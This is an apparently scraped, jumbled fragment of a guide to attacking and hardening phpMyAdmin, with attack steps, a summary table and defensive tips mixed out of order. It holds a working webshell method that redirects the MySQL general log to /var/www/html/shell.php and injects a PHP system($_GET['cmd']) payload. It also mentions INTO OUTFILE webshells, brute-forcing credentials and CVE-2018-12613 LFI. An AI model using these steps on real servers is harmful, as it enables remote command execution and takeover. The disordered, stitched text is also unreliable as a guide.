If the database user has FILE privilege and secure_file_priv is empty, write a webshell:
Works even when INTO OUTFILE is disabled.
Users must provide a username and password. These modes are safer but still vulnerable to brute-force attacks if rate limiting is not enforced at the web server layer.
3. Exploiting Known Vulnerabilities (CVEs)
From phpMyAdmin SQL tab:
Change the default /phpmyadmin URL to a non-obvious name.
Summary Table of Verified Attacks
Brute Force Credentials Metasploit, Burp
CVE-2018-12613 LFI manipulation
INTO OUTFILE MySQL File Privilege
Log Manipulation General Log exploitation
A SQL injection flaw in the user privileges page affects versions under 5.0.2. An authenticated attacker can exploit this to escalate privileges or manipulate system files under specific environments.
5. Defensive Countermeasures and Hardening
If INTO OUTFILE fails, hijack the MySQL General Log.
If you can upload a shared library (Linux only):
$cfg['Servers'][$i]['controluser'] = 'pma_user';
$cfg['Servers'][$i]['controlpass'] = 'secret';
SHOW VARIABLES LIKE 'general_log_file';
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';
SELECT "<?php system($_GET['cmd']); ?>";
SET GLOBAL general_log = 'OFF';
Check for /README, /ChangeLog, or /Documentation.html at the root directory.